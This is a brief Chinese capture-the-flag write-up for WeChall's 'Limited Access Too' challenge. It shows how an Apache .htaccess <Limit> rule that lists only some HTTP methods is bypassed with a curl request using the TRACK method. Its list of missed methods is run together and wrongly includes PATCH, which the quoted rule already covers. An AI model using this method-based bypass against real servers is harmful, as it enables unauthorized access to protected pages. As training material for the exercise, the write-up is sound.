WeChall - Limited Access Too

Posted on In Views: Disqus:

Challenge

管理员根据 feedback "修复" 了上一个版本(Limited Access)中的 .htaccess,现在 protected/protected.php 更加安全了。需要再次访问它。

Solution

上一个版本用 <Limit GET> 限制了 GET 方法,通过改用 POST 绕过。这个"修复"版本在 .htaccess 里封了更多方法:

1
2
3
<Limit GET POST HEAD PUT DELETE CONNECT OPTIONS PATCH>
require valid-user
</Limit>

Apache 的 <Limit> 指令只拦截明确列出的方法,未列出的方法不受限制。上面漏掉了 TRACKPATCHPROPFINDMOVE 等非标准扩展方法。

直接用 TRACK 方法绕过:

1
2
$ curl -X TRACK -b 'WC=...' \
  'https://www.wechall.net/en/challenge/wannabe7331/limited_access_too/protected/protected.php'

返回受保护页面的内容,挑战即完成(auto-solve,无需额外提交)。